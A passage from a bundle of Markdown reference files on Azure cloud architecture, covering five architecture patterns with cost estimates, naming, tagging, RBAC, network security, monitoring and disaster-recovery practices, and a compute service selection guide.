| Shared resource groups for everything | Blast radius, RBAC nightmares | One resource group per environment per workload |
| No tagging strategy | Cannot track costs or ownership | Tag: environment, owner, cost-center, app-name |
| Using classic resources | Deprecated, limited features | Use ARM/Bicep resources exclusively |

---

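The Key Vault reference row deserves a concrete shape: an App Service setting whose *value* is a reference resolves the secret at runtime, so only the URI is visible in the portal. A sketch, with illustrative resource names:

```python
# App Service app settings as a dict; the vault and secret names
# (kv-myapp-prod, db-conn) are illustrative.
app_settings = {
    # Plain setting -- fine for non-secrets.
    "ASPNETCORE_ENVIRONMENT": "Production",
    # Key Vault reference -- the platform resolves the secret at runtime
    # instead of the connection string being pasted into App Settings.
    "DB_CONNECTION_STRING": (
        "@Microsoft.KeyVault("
        "SecretUri=https://kv-myapp-prod.vault.azure.net/secrets/db-conn/)"
    ),
}

def is_kv_reference(value: str) -> bool:
    """True when a setting value is a Key Vault reference, not a literal."""
    return value.startswith("@Microsoft.KeyVault(")

print({k: is_kv_reference(v) for k, v in app_settings.items()})
```

The app's Managed Identity still needs the Key Vault Secrets User role on the vault for the reference to resolve.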
## Output Formats

### Architecture Design

- Pattern recommendation with rationale
- Service stack diagram (ASCII)
- Monthly cost estimate and trade-offs

### IaC Templates

- **Bicep**: Recommended — first-party, module support, clean syntax
- **ARM JSON**: Generated from Bicep when needed
- **Terraform HCL**: Multi-cloud compatible using azurerm provider

### Cost Analysis

- Current spend breakdown with optimization recommendations
- Priority action list (high/medium/low) and implementation checklist

---

## Reference Documentation

| Document | Contents |
|----------|----------|
| `references/architecture_patterns.md` | 5 patterns: web app, microservices/AKS, serverless, data pipeline, multi-region |
| `references/service_selection.md` | Decision matrices for compute, database, storage, messaging, networking |
| `references/best_practices.md` | Naming conventions, tagging, RBAC, network security, monitoring, DR |
# Azure Architecture Patterns

Reference guide for selecting the right Azure architecture pattern based on application requirements.

---

## Table of Contents

- [Pattern Selection Matrix](#pattern-selection-matrix)
- [Pattern 1: App Service Web Application](#pattern-1-app-service-web-application)
- [Pattern 2: Microservices on AKS](#pattern-2-microservices-on-aks)
- [Pattern 3: Serverless Event-Driven](#pattern-3-serverless-event-driven)
- [Pattern 4: Data Pipeline](#pattern-4-data-pipeline)
- [Pattern 5: Multi-Region Active-Active](#pattern-5-multi-region-active-active)
- [Well-Architected Framework Alignment](#well-architected-framework-alignment)

---

## Pattern Selection Matrix

| Pattern | Best For | Users | Monthly Cost | Complexity |
|---------|----------|-------|--------------|------------|
| App Service Web | MVPs, SaaS, APIs | <100K | $50-500 | Low |
| Microservices on AKS | Complex platforms, multi-team | Any | $500-5000 | High |
| Serverless Event-Driven | Event processing, webhooks, APIs | <1M | $20-500 | Low-Medium |
| Data Pipeline | Analytics, ETL, ML | Any | $200-3000 | Medium-High |
| Multi-Region Active-Active | Global apps, 99.99% uptime | >100K | 1.5-2x single | High |

---

## Pattern 1: App Service Web Application

### Architecture

```
        ┌──────────────┐
        │ Azure Front  │
        │    Door      │
        │  (CDN + WAF) │
        └──────┬───────┘
               │
        ┌──────▼───────┐
        │ App Service  │
        │ (Linux P1v3) │
        │   + Slots    │
        └──┬───────┬───┘
           │       │
  ┌────────▼──┐ ┌──▼────────┐
  │ Azure SQL │ │   Blob    │
  │ Serverless│ │  Storage  │
  └───────────┘ └───────────┘
        │
  ┌─────▼─────────────┐
  │    Key Vault      │
  │ (secrets, certs)  │
  └───────────────────┘
```

### Services

| Service | Purpose | Configuration |
|---------|---------|---------------|
| Azure Front Door | Global CDN, WAF, SSL | Standard or Premium tier, custom domain |
| App Service | Web application hosting | Linux P1v3 (production), B1 (dev) |
| Azure SQL Database | Relational database | Serverless GP_S_Gen5_2 with auto-pause |
| Blob Storage | Static assets, uploads | Hot tier with lifecycle policies |
| Key Vault | Secrets management | RBAC authorization, soft-delete enabled |
| Application Insights | Monitoring and APM | Workspace-based, connected to Log Analytics |
| Entra ID | Authentication | Easy Auth or MSAL library |

### Deployment Strategy

- **Deployment slots**: staging slot for zero-downtime deploys, swap to production after validation
- **Auto-scale**: CPU-based rules, 1-10 instances in production
- **Health checks**: `/health` endpoint monitored by App Service and Front Door

### Cost Estimate

| Component | Dev | Production |
|-----------|-----|-----------|
| App Service | $13 (B1) | $75 (P1v3) |
| Azure SQL | $5 (Basic) | $40-120 (Serverless GP) |
| Front Door | $0 (disabled) | $35-55 |
| Blob Storage | $1 | $5-15 |
| Key Vault | $0.03 | $1-5 |
| Application Insights | $0 (free tier) | $5-20 |
| **Total** | **~$19** | **~$160-290** |

---

## Pattern 2: Microservices on AKS

### Architecture

```
        ┌──────────────┐
        │ Azure Front  │
        │    Door      │
        └──────┬───────┘
               │
        ┌──────▼───────┐
        │   API Mgmt   │
        │  (gateway)   │
        └──────┬───────┘
               │
  ┌────────────▼────────────┐
  │       AKS Cluster       │
  │  ┌───────┐  ┌───────┐   │
  │  │ svc-A │  │ svc-B │   │
  │  └───┬───┘  └───┬───┘   │
  │      │          │       │
  │  ┌───▼──────────▼───┐   │
  │  │   Service Bus    │   │
  │  │   (async msgs)   │   │
  │  └──────────────────┘   │
  └─────────────────────────┘
        │           │
  ┌─────▼─────┐ ┌───▼───────┐
  │ Cosmos DB │ │    ACR    │
  │  (data)   │ │ (images)  │
  └───────────┘ └───────────┘
```

### Services

| Service | Purpose | Configuration |
|---------|---------|---------------|
| AKS | Container orchestration | 3 node pools: system (D2s_v5), app (D4s_v5), jobs (spot) |
| API Management | API gateway, rate limiting | Standard v2 or Consumption tier |
| Cosmos DB | Multi-model database | Session consistency, autoscale RU/s |
| Service Bus | Async messaging | Standard tier, topics for pub/sub |
| Container Registry | Docker image storage | Basic (dev), Standard (prod) |
| Key Vault | Secrets for pods | CSI driver + workload identity |
| Azure Monitor | Cluster and app observability | Container Insights + App Insights |

### AKS Best Practices

**Node Pools:**
- System pool: 2-3 nodes, D2s_v5, taints for system pods only
- App pool: 2-10 nodes (autoscaler), D4s_v5, for application workloads
- Jobs pool: spot instances, for batch processing and CI runners

**Networking:**
- Azure CNI for VNet-native pod networking
- Network policies (Azure or Calico) for pod-to-pod isolation
- Ingress via NGINX Ingress Controller or Application Gateway Ingress Controller (AGIC)

**Security:**
- Workload Identity for pod-to-Azure service auth (replaces pod identity)
- Azure Policy for Kubernetes (OPA Gatekeeper)
- Defender for Containers for runtime threat detection
- Private cluster for production (API server not exposed to internet)

**Deployment:**
- Helm charts for application packaging
- Flux or ArgoCD for GitOps
- Horizontal Pod Autoscaler (HPA) + KEDA for event-driven scaling

### Cost Estimate

| Component | Dev | Production |
|-----------|-----|-----------|
| AKS nodes (system) | $60 (1x D2s_v5) | $180 (3x D2s_v5) |
| AKS nodes (app) | $120 (1x D4s_v5) | $360 (3x D4s_v5) |
| API Management | $0 (Consumption) | $175 (Standard v2) |
| Cosmos DB | $25 (serverless) | $100-400 (autoscale) |
| Service Bus | $10 | $10-50 |
| Container Registry | $5 | $20 |
| Monitoring | $0 | $50-100 |
| **Total** | **~$220** | **~$900-1300** |

---

## Pattern 3: Serverless Event-Driven

### Architecture

```
┌──────────┐  ┌──────────┐  ┌──────────┐
│   HTTP   │  │   Blob   │  │  Timer   │
│ Trigger  │  │ Trigger  │  │ Trigger  │
└────┬─────┘  └────┬─────┘  └────┬─────┘
     │             │             │
     └──────┬──────┴──────┬──────┘
            │             │
     ┌──────▼───────┐ ┌───▼──────────┐
     │    Azure     │ │    Azure     │
     │  Functions   │ │  Functions   │
     │  (handlers)  │ │  (workers)   │
     └──┬──────┬────┘ └───────┬──────┘
        │      │              │
┌───────▼──┐ ┌─▼──────────┐ ┌─▼──────────┐
│  Event   │ │  Service   │ │ Cosmos DB  │
│  Grid    │ │ Bus Queue  │ │   (data)   │
│ (fanout) │ │ (reliable) │ │            │
└──────────┘ └────────────┘ └────────────┘
```

### Services

| Service | Purpose | Configuration |
|---------|---------|---------------|
| Azure Functions | Event handlers, APIs | Consumption plan (dev), Premium (prod) |
| Event Grid | Event routing and fan-out | System + custom topics |
| Service Bus | Reliable messaging with DLQ | Basic or Standard, queues + topics |
| Cosmos DB | Low-latency data store | Serverless (dev), autoscale (prod) |
| Blob Storage | File processing triggers | Lifecycle policies |
| Application Insights | Function monitoring | Sampling at 5-10% for high volume |

### Durable Functions Patterns

Use Durable Functions for orchestration instead of building custom state machines:

| Pattern | Use Case | Example |
|---------|----------|---------|
| Function chaining | Sequential steps | Order: validate -> charge -> fulfill -> notify |
| Fan-out/fan-in | Parallel processing | Process all images in a batch, aggregate results |
| Async HTTP APIs | Long-running operations | Start job, poll for status, return result |
| Monitor | Periodic polling | Check external API until condition met |
| Human interaction | Approval workflows | Send approval email, wait for response with timeout |

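The fan-out/fan-in row can be illustrated with plain `concurrent.futures` — a sketch of the pattern's shape only, not the Durable Functions SDK (which expresses the same idea with an orchestrator function scheduling activity tasks):

```python
from concurrent.futures import ThreadPoolExecutor

def process_image(name: str) -> int:
    # Stand-in activity: pretend the "work" is measuring the name.
    return len(name)

def fan_out_fan_in(batch: list[str]) -> int:
    # Fan out: one task per item; fan in: aggregate all the results.
    with ThreadPoolExecutor(max_workers=4) as pool:
        results = list(pool.map(process_image, batch))
    return sum(results)

print(fan_out_fan_in(["a.png", "bb.png", "ccc.png"]))  # 18
```

In Durable Functions the pool is replaced by the runtime: the orchestrator schedules all activities, checkpoints, and resumes when every result is in, so the fan-in survives process restarts.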
### Cost Estimate

| Component | Dev | Production |
|-----------|-----|-----------|
| Functions (Consumption) | $0 (1M free) | $5-30 |
| Event Grid | $0 | $0-5 |
| Service Bus | $0 (Basic) | $10-30 |
| Cosmos DB | $0 (serverless free tier) | $25-150 |
| Blob Storage | $1 | $5-15 |
| Application Insights | $0 | $5-15 |
| **Total** | **~$1** | **~$50-245** |

---

## Pattern 4: Data Pipeline

### Architecture

```
┌──────────┐  ┌──────────┐
│ IoT/Apps │  │  Batch   │
│ (events) │  │ (files)  │
└────┬─────┘  └────┬─────┘
     │             │
┌────▼─────┐  ┌────▼─────┐
│  Event   │  │   Data   │
│   Hubs   │  │ Factory  │
└────┬─────┘  └────┬─────┘
     │             │
     └──────┬──────┘
            │
   ┌────────▼────────┐
   │    Data Lake    │
   │  Storage Gen2   │
   │  (raw/curated)  │
   └────────┬────────┘
            │
   ┌────────▼────────┐
   │     Synapse     │
   │    Analytics    │
   │  (SQL + Spark)  │
   └────────┬────────┘
            │
   ┌────────▼────────┐
   │    Power BI     │
   │  (dashboards)   │
   └─────────────────┘
```

### Services

| Service | Purpose | Configuration |
|---------|---------|---------------|
| Event Hubs | Real-time event ingestion | Standard, 2-8 partitions |
| Data Factory | Batch ETL orchestration | Managed, 90+ connectors |
| Data Lake Storage Gen2 | Raw and curated data lake | HNS enabled, lifecycle policies |
| Synapse Analytics | SQL and Spark analytics | Serverless SQL pool (pay-per-query) |
| Azure Functions | Lightweight processing | Triggered by Event Hubs or Blob |
| Power BI | Business intelligence | Pro ($10/user/month) |

### Data Lake Organization

```
data-lake/
├── raw/                  # Landing zone — immutable source data
│   ├── source-system-a/
│   │   └── YYYY/MM/DD/   # Date-partitioned
│   └── source-system-b/
├── curated/              # Cleaned, validated, business-ready
│   ├── dimension/
│   └── fact/
├── sandbox/              # Ad-hoc exploration
└── archive/              # Cold storage (lifecycle policy target)
```

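The date-partitioned layout under `raw/` is worth generating deterministically, so writers and readers always agree on paths; a minimal sketch following the convention in the tree above (the helper itself is hypothetical):

```python
from datetime import datetime

def raw_path(source_system: str, event_time: datetime) -> str:
    """Build the raw-zone folder path: raw/<source>/YYYY/MM/DD/."""
    return (f"raw/{source_system}/"
            f"{event_time:%Y}/{event_time:%m}/{event_time:%d}/")

print(raw_path("source-system-a", datetime(2024, 7, 9)))
# raw/source-system-a/2024/07/09/
```

Zero-padded months and days keep lexicographic order equal to chronological order, which is what makes date-range scans over the lake cheap.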
### Cost Estimate

| Component | Dev | Production |
|-----------|-----|-----------|
| Event Hubs (1 TU) | $22 | $44-176 |
| Data Factory | $0 (free tier) | $50-200 |
| Data Lake Storage | $5 | $20-80 |
| Synapse Serverless SQL | $5 | $50-300 |
| Azure Functions | $0 | $5-20 |
| Power BI Pro | $10/user | $10/user |
| **Total** | **~$42** | **~$180-800** |

---

## Pattern 5: Multi-Region Active-Active

### Architecture

```
          ┌──────────────┐
          │ Azure Front  │
          │ Door (Global │
          │  LB + WAF)   │
          └──┬────────┬──┘
             │        │
  ┌──────────▼──┐  ┌──▼──────────┐
  │  Region 1   │  │  Region 2   │
  │  (East US)  │  │  (West EU)  │
  │             │  │             │
  │ App Service │  │ App Service │
  │  + SQL      │  │  + SQL      │
  │  + Redis    │  │  + Redis    │
  └──────┬──────┘  └──────┬──────┘
         │                │
  ┌──────▼────────────────▼──────┐
  │          Cosmos DB           │
  │    (multi-region writes)     │
  │     Session consistency      │
  └──────────────────────────────┘
```

### Multi-Region Design Decisions

| Decision | Recommendation | Rationale |
|----------|---------------|-----------|
| Global load balancer | Front Door Premium | Built-in WAF, CDN, health probes, fastest failover |
| Database replication | Cosmos DB multi-write or SQL failover groups | Cosmos for global writes, SQL for relational needs |
| Session state | Azure Cache for Redis (per region) | Local sessions, avoid cross-region latency |
| Static content | Front Door CDN | Edge-cached, no origin required |
| DNS strategy | Front Door handles routing | No separate Traffic Manager needed |
| Failover | Automatic (Front Door health probes) | 10-30 second detection, automatic reroute |

### Azure SQL Failover Groups vs Cosmos DB Multi-Region

| Feature | SQL Failover Groups | Cosmos DB Multi-Region |
|---------|-------------------|----------------------|
| Replication | Async (RPO ~5s) | Sync or async (configurable) |
| Write region | Single primary | Multi-write capable |
| Failover | Automatic or manual (60s grace) | Automatic |
| Consistency | Strong (single writer) | 5 levels (session recommended) |
| Cost | 2x compute (active-passive) | Per-region RU/s charge |
| Best for | Relational data, transactions | Document data, global low-latency |

### Cost Impact

Multi-region typically costs 1.5-2x single region:

- Compute: 2x (running in both regions)
- Database: 1.5-2x (replication, multi-write)
- Networking: Additional cross-region data transfer (~$0.02-0.05/GB)
- Front Door Premium: ~$100-200/month

---

## Well-Architected Framework Alignment

Every architecture pattern should address all five pillars of the Azure Well-Architected Framework.

### Reliability

- Deploy across Availability Zones (zone-redundant App Service, AKS, SQL)
- Enable health probes at every layer
- Implement retry policies with exponential backoff (Polly for .NET, tenacity for Python)
- Define RPO/RTO and test disaster recovery quarterly
- Use Azure Chaos Studio for fault injection testing

### Security

- Entra ID for all human and service authentication
- Managed Identity for all Azure service-to-service communication
- Key Vault for secrets, certificates, and encryption keys — no secrets in code or config
- Private Endpoints for all PaaS services in production
- Microsoft Defender for Cloud for threat detection and compliance

### Cost Optimization

- Use serverless and consumption-based services where possible
- Auto-pause Azure SQL in dev/test (serverless tier)
- Spot VMs for fault-tolerant AKS node pools
- Reserved Instances for steady-state production workloads (1-year = 35% savings)
- Azure Advisor cost recommendations — review weekly
- Set budgets and alerts at subscription and resource group level

### Operational Excellence

- Bicep for all infrastructure (no manual portal deployments)
- GitOps for AKS (Flux or ArgoCD)
- Deployment slots or blue-green for zero-downtime deploys
- Centralized logging in Log Analytics with standardized KQL queries
- Azure DevOps or GitHub Actions for CI/CD with workload identity federation

### Performance Efficiency

- Application Insights for distributed tracing and performance profiling
- Azure Cache for Redis for session state and hot-path caching
- Front Door for edge caching and global acceleration
- Autoscale rules on compute (CPU, memory, HTTP queue length)
- Load testing with Azure Load Testing before production launch
# Azure Best Practices

Production-ready practices for naming, tagging, security, networking, monitoring, and disaster recovery on Azure.

---

## Table of Contents

- [Naming Conventions](#naming-conventions)
- [Tagging Strategy](#tagging-strategy)
- [RBAC and Least Privilege](#rbac-and-least-privilege)
- [Network Security](#network-security)
- [Monitoring and Alerting](#monitoring-and-alerting)
- [Disaster Recovery](#disaster-recovery)
- [Common Pitfalls](#common-pitfalls)

---

## Naming Conventions

Follow the Azure Cloud Adoption Framework (CAF) naming convention for consistency and automation.

### Format

```
<resource-type>-<workload>-<environment>-<region>-<instance>
```

### Examples

| Resource | Naming Pattern | Example |
|----------|---------------|---------|
| Resource Group | rg-\<workload\>-\<env\> | rg-myapp-prod |
| App Service | app-\<workload\>-\<env\> | app-myapp-prod |
| App Service Plan | plan-\<workload\>-\<env\> | plan-myapp-prod |
| Azure SQL Server | sql-\<workload\>-\<env\> | sql-myapp-prod |
| Azure SQL Database | sqldb-\<workload\>-\<env\> | sqldb-myapp-prod |
| Storage Account | st\<workload\>\<env\> (no hyphens) | stmyappprod |
| Key Vault | kv-\<workload\>-\<env\> | kv-myapp-prod |
| AKS Cluster | aks-\<workload\>-\<env\> | aks-myapp-prod |
| Container Registry | cr\<workload\>\<env\> (no hyphens) | crmyappprod |
| Virtual Network | vnet-\<workload\>-\<env\> | vnet-myapp-prod |
| Subnet | snet-\<purpose\> | snet-app, snet-data |
| NSG | nsg-\<subnet-name\> | nsg-snet-app |
| Public IP | pip-\<resource\>-\<env\> | pip-agw-prod |
| Cosmos DB | cosmos-\<workload\>-\<env\> | cosmos-myapp-prod |
| Service Bus | sb-\<workload\>-\<env\> | sb-myapp-prod |
| Event Hubs | evh-\<workload\>-\<env\> | evh-myapp-prod |
| Log Analytics | log-\<workload\>-\<env\> | log-myapp-prod |
| Application Insights | ai-\<workload\>-\<env\> | ai-myapp-prod |

### Rules

- Lowercase only (some resources require it — be consistent everywhere)
- Hyphens as separators (except where disallowed: storage accounts, container registries)
- No longer than the resource type max length (e.g., storage accounts max 24 characters)
- Environment abbreviations: `dev`, `stg`, `prod`
- Region abbreviations: `eus` (East US), `weu` (West Europe), `sea` (Southeast Asia)

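The convention is mechanical enough to encode once and reuse across IaC modules; a sketch (hypothetical helper) that applies the prefix table above and the no-hyphen exceptions:

```python
# Prefixes from the examples table above (abbreviated). Storage accounts
# and container registries disallow hyphens, so those names are squashed.
PREFIXES = {"resource_group": "rg", "app_service": "app",
            "key_vault": "kv", "storage_account": "st",
            "container_registry": "cr", "aks": "aks"}
NO_HYPHENS = {"storage_account", "container_registry"}

def caf_name(resource_type: str, workload: str, env: str) -> str:
    """Build a CAF-style resource name: <prefix>-<workload>-<env>."""
    prefix = PREFIXES[resource_type]
    if resource_type in NO_HYPHENS:
        return f"{prefix}{workload}{env}".lower()
    return f"{prefix}-{workload}-{env}".lower()

print(caf_name("storage_account", "myapp", "prod"))  # stmyappprod
print(caf_name("key_vault", "myapp", "prod"))        # kv-myapp-prod
```

A production version would also enforce per-type length limits (e.g. 24 characters for storage accounts) and validate the character set.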
---

## Tagging Strategy

Tags enable cost allocation, ownership tracking, and automation. Apply to every resource.

### Required Tags

| Tag Key | Purpose | Example Values |
|---------|---------|---------------|
| environment | Cost splitting, policy targeting | dev, staging, production |
| app-name | Workload identification | myapp, data-pipeline |
| owner | Team or individual responsible | platform-team, jane.doe@company.com |
| cost-center | Finance allocation | CC-1234, engineering |

### Recommended Tags

| Tag Key | Purpose | Example Values |
|---------|---------|---------------|
| created-by | IaC or manual tracking | bicep, terraform, portal |
| data-classification | Security posture | public, internal, confidential |
| compliance | Regulatory requirements | hipaa, gdpr, sox |
| auto-shutdown | Dev/test cost savings | true, false |

### Enforcement

Use Azure Policy to enforce tagging:

```json
{
  "if": {
    "allOf": [
      { "field": "tags['environment']", "exists": "false" },
      { "field": "type", "notEquals": "Microsoft.Resources/subscriptions/resourceGroups" }
    ]
  },
  "then": { "effect": "deny" }
}
```

---

## RBAC and Least Privilege

### Principles

1. **Use built-in roles** before creating custom roles
2. **Assign roles to groups**, not individual users
3. **Scope to the narrowest level** — resource group or resource, not subscription
4. **Use Managed Identity** for service-to-service — never store credentials
5. **Enable Entra ID PIM** (Privileged Identity Management) for just-in-time admin access

### Common Role Assignments

| Persona | Scope | Role |
|---------|-------|------|
| Developer | Resource Group (dev) | Contributor |
| Developer | Resource Group (prod) | Reader |
| CI/CD pipeline | Resource Group | Contributor (via workload identity) |
| App Service | Key Vault | Key Vault Secrets User |
| App Service | Azure SQL | SQL DB Contributor (or Entra auth) |
| AKS pod | Cosmos DB | Cosmos DB Built-in Data Contributor |
| Security team | Subscription | Security Reader |
| Platform team | Subscription | Owner (with PIM) |

### Workload Identity Federation

For CI/CD pipelines (GitHub Actions, Azure DevOps), use workload identity federation instead of service principal secrets:

```bash
# Create federated credential (GitHub Actions example)
az ad app federated-credential create \
  --id <app-object-id> \
  --parameters '{
    "name": "github-main",
    "issuer": "https://token.actions.githubusercontent.com",
    "subject": "repo:org/repo:ref:refs/heads/main",
    "audiences": ["api://AzureADTokenExchange"]
  }'
```

---

## Network Security

### Defense in Depth

| Layer | Control | Implementation |
|-------|---------|---------------|
| Edge | DDoS + WAF | Azure DDoS Protection + Front Door WAF |
| Perimeter | Firewall | Azure Firewall or NVA for hub VNet |
| Network | Segmentation | VNet + subnets + NSGs |
| Application | Access control | Private Endpoints + Managed Identity |
| Data | Encryption | TLS 1.2+ in transit, CMK at rest |

### Private Endpoints

Every PaaS service in production must use Private Endpoints:

| Service | Private Endpoint Support | Private DNS Zone |
|---------|------------------------|------------------|
| Azure SQL | Yes | privatelink.database.windows.net |
| Cosmos DB | Yes | privatelink.documents.azure.com |
| Key Vault | Yes | privatelink.vaultcore.azure.net |
| Storage (Blob) | Yes | privatelink.blob.core.windows.net |
| Container Registry | Yes | privatelink.azurecr.io |
| Service Bus | Yes | privatelink.servicebus.windows.net |
| App Service | VNet Integration (outbound) + Private Endpoint (inbound) | privatelink.azurewebsites.net |

### NSG Rules Baseline

Every subnet should have an NSG. Start with deny-all inbound, then open only what is needed:

```
Priority  Direction  Action  Source      Destination  Port
100       Inbound    Allow   Front Door  App Subnet   443
200       Inbound    Allow   App Subnet  Data Subnet  1433,5432
300       Inbound    Allow   VNet        VNet         Any (internal)
4096      Inbound    Deny    Any         Any          Any
```

### Application Gateway + WAF

For single-region web apps without Front Door:

- Application Gateway v2 with WAF enabled
- OWASP 3.2 rule set + custom rules
- Rate limiting per client IP
- Bot protection (managed rule set)
- SSL termination with Key Vault certificate

---

## Monitoring and Alerting

### Monitoring Stack

```
Application Insights (APM + distributed tracing)
        │
        ▼
Log Analytics Workspace (central log store)
        │
        ▼
Azure Monitor Alerts (metric + log-based)
        │
        ▼
Action Groups (email, Teams, PagerDuty, webhook)
```

### Essential Alerts

| Alert | Condition | Severity |
|-------|-----------|----------|
| App Service HTTP 5xx | > 10 in 5 minutes | Critical (Sev 1) |
| App Service response time | P95 > 2 seconds | Warning (Sev 2) |
| Azure SQL DTU/CPU | > 80% for 10 minutes | Warning (Sev 2) |
| Azure SQL deadlocks | > 0 | Warning (Sev 2) |
| Cosmos DB throttled requests | 429 count > 10 in 5 min | Warning (Sev 2) |
| AKS node CPU | > 80% for 10 minutes | Warning (Sev 2) |
| AKS pod restart count | > 5 in 10 minutes | Critical (Sev 1) |
| Key Vault access denied | > 0 | Critical (Sev 1) |
| Budget threshold | 80% of monthly budget | Warning (Sev 3) |
| Budget threshold | 100% of monthly budget | Critical (Sev 1) |

### KQL Queries for Troubleshooting

**App Service slow requests:**
```kql
requests
| where duration > 2000
| summarize count(), avg(duration), percentile(duration, 95) by name
| order by count_ desc
| take 10
```

**Failed dependencies (SQL, HTTP, etc.):**
```kql
dependencies
| where success == false
| summarize count() by type, target, resultCode
| order by count_ desc
```

**AKS pod errors:**
```kql
KubePodInventory
| where PodStatus != "Running" and PodStatus != "Succeeded"
| summarize count() by PodStatus, Namespace, Name
| order by count_ desc
```

### Application Insights Configuration

- Enable **distributed tracing** with W3C trace context
- Set **sampling** to 5-10% for high-volume production (100% for dev)
- Enable **profiler** for .NET applications
- Enable **snapshot debugger** for exception analysis
- Configure **availability tests** (URL ping every 5 minutes from multiple regions)

---

## Disaster Recovery
|
||||
|
||||
### RPO/RTO Mapping
|
||||
|
||||
| Tier | RPO | RTO | Strategy | Cost |
|
||||
|------|-----|-----|----------|------|
|
||||
| Tier 1 (critical) | < 5 minutes | < 1 hour | Active-active multi-region | 2x |
|
||||
| Tier 2 (important) | < 1 hour | < 4 hours | Warm standby | 1.3x |
|
||||
| Tier 3 (standard) | < 24 hours | < 24 hours | Backup and restore | 1.1x |
|
||||
| Tier 4 (non-critical) | < 72 hours | < 72 hours | Rebuild from IaC | 1x |
|
||||
|
||||
### Backup Strategy

| Service | Backup Method | Retention |
|---------|--------------|-----------|
| Azure SQL | Automated backups | 7 days (short-term), 10 years (long-term) |
| Cosmos DB | Continuous backup + point-in-time restore | 7-30 days |
| Blob Storage | Soft delete + versioning + geo-redundant | 30 days soft delete |
| AKS | Velero backup to Blob Storage | 7 days |
| Key Vault | Soft delete + purge protection | 90 days |
| App Service | Manual or automated (Backup and Restore feature) | Custom |

### Storage Redundancy

| Redundancy | Regions | Durability | Use Case |
|-----------|---------|-----------|----------|
| LRS | 1 (3 copies) | 11 nines | Dev/test, easily recreatable data |
| ZRS | 1 (3 AZs) | 12 nines | Production, zone failure protection |
| GRS | 2 (6 copies) | 16 nines | Business-critical, regional failure protection |
| GZRS | 2 (3 AZs + secondary) | 16 nines | Most critical data, best protection |

**Default to ZRS for production.** Use GRS/GZRS only when cross-region DR is required.

### DR Testing Checklist

- [ ] Verify automated backups are running and retention is correct
- [ ] Test point-in-time restore for databases (monthly)
- [ ] Test regional failover for SQL failover groups (quarterly)
- [ ] Validate IaC can recreate full environment from scratch
- [ ] Test Front Door failover by taking down primary region health endpoint
- [ ] Document and test runbook for manual failover steps
- [ ] Measure actual RTO vs target during DR drill
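For the last checklist item, a tiny helper keeps drill results comparable from quarter to quarter. A sketch (names and timestamp format are illustrative):

```python
from datetime import datetime

def measure_rto(outage_start: str, service_restored: str, target_hours: float) -> dict:
    """Compare the measured RTO of a DR drill against the tier target."""
    fmt = "%Y-%m-%dT%H:%M"
    actual = (datetime.strptime(service_restored, fmt)
              - datetime.strptime(outage_start, fmt)).total_seconds() / 3600
    return {
        "actual_rto_hours": round(actual, 2),
        "target_hours": target_hours,
        "within_target": actual <= target_hours,
    }

# Drill: failover initiated 09:00, app healthy again 11:30, Tier 2 target is 4h.
print(measure_rto("2024-05-01T09:00", "2024-05-01T11:30", 4.0))
# {'actual_rto_hours': 2.5, 'target_hours': 4.0, 'within_target': True}
```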
---

## Common Pitfalls

### Cost Pitfalls

| Pitfall | Impact | Prevention |
|---------|--------|-----------|
| No budget alerts | Unexpected bills | Set alerts at 50%, 80%, 100% on day one |
| Premium tier in dev/test | 3-5x overspend | Use Basic/Free tiers, auto-shutdown VMs |
| Orphaned resources | Silent monthly charges | Tag everything, review Cost Management weekly |
| Ignoring Reserved Instances | 35-55% overpay on steady workloads | Review Azure Advisor quarterly |
| Over-provisioned Cosmos DB RU/s | Paying for unused throughput | Use autoscale or serverless |
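The budget-alert rule in the first row is easy to standardize across subscriptions. A sketch that computes the alert amounts for a monthly budget (the helper name is illustrative; thresholds follow the 50/80/100 guidance above):

```python
def budget_alert_amounts(monthly_budget_usd: float, thresholds=(0.5, 0.8, 1.0)) -> list:
    """Return (percentage, dollar amount) pairs for Cost Management alert rules."""
    return [(int(t * 100), round(monthly_budget_usd * t, 2)) for t in thresholds]

print(budget_alert_amounts(500))  # [(50, 250.0), (80, 400.0), (100, 500.0)]
```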
### Security Pitfalls

| Pitfall | Impact | Prevention |
|---------|--------|-----------|
| Secrets in App Settings | Leaked credentials | Use Key Vault references |
| Public PaaS endpoints | Exposed attack surface | Private Endpoints + VNet integration |
| Contributor role on subscription | Overprivileged access | Scope to resource group, use PIM |
| No diagnostic settings | Blind to attacks | Enable on every resource from day one |
| SQL password authentication | Weak identity model | Entra-only auth, Managed Identity |

### Operational Pitfalls

| Pitfall | Impact | Prevention |
|---------|--------|-----------|
| Manual portal deployments | Drift, no audit trail | Bicep for everything, block portal changes via Policy |
| No health checks configured | Silent failures | /health endpoint, Front Door probes, App Service checks |
| Single region deployment | Single point of failure | At minimum, use Availability Zones |
| No tagging strategy | Cannot track costs/ownership | Enforce via Azure Policy from day one |
| Ignoring Azure Advisor | Missed optimizations | Weekly review, enable email digest |
# Azure Service Selection Guide

Quick reference for choosing the right Azure service based on workload requirements.

---

## Table of Contents

- [Compute Services](#compute-services)
- [Database Services](#database-services)
- [Storage Services](#storage-services)
- [Messaging and Events](#messaging-and-events)
- [Networking](#networking)
- [Security and Identity](#security-and-identity)
- [Monitoring and Observability](#monitoring-and-observability)

---

## Compute Services

### Decision Matrix

| Requirement | Recommended Service |
|-------------|---------------------|
| Event-driven, short tasks (<10 min) | Azure Functions (Consumption) |
| Event-driven, longer tasks (<30 min) | Azure Functions (Premium) |
| Containerized apps, simple deployment | Azure Container Apps |
| Full Kubernetes control | AKS |
| Traditional web apps (PaaS) | App Service |
| GPU, HPC, custom OS | Virtual Machines |
| Batch processing | Azure Batch |
| Simple container from source | App Service (container) |

### Azure Functions vs Container Apps vs AKS vs App Service

| Feature | Functions | Container Apps | AKS | App Service |
|---------|-----------|---------------|-----|-------------|
| Scale to zero | Yes (Consumption) | Yes | No (min 1 node) | No |
| Kubernetes | No | Built on K8s (abstracted) | Full K8s | No |
| Cold start | 1-5s (Consumption) | 0-2s | N/A | N/A |
| Max execution time | 10 min (Consumption), 30 min (Premium) | Unlimited | Unlimited | Unlimited |
| Languages | C#, JS, Python, Java, Go, Rust, PowerShell | Any container | Any container | .NET, Node, Python, Java, PHP, Ruby |
| Pricing model | Per-execution | Per vCPU-second | Per node | Per plan |
| Best for | Event handlers, APIs, scheduled jobs | Microservices, APIs | Complex platforms, multi-team | Web apps, APIs, mobile backends |
| Operational complexity | Low | Low-Medium | High | Low |
| Dapr integration | No | Built-in | Manual | No |
| KEDA autoscaling | No | Built-in | Manual install | No |

**Opinionated recommendation:**

- **Start with App Service** for web apps and APIs — simplest operational model.
- **Use Container Apps** for microservices — serverless containers without Kubernetes complexity.
- **Use AKS** only when you need full Kubernetes API access (custom operators, service mesh, multi-cluster).
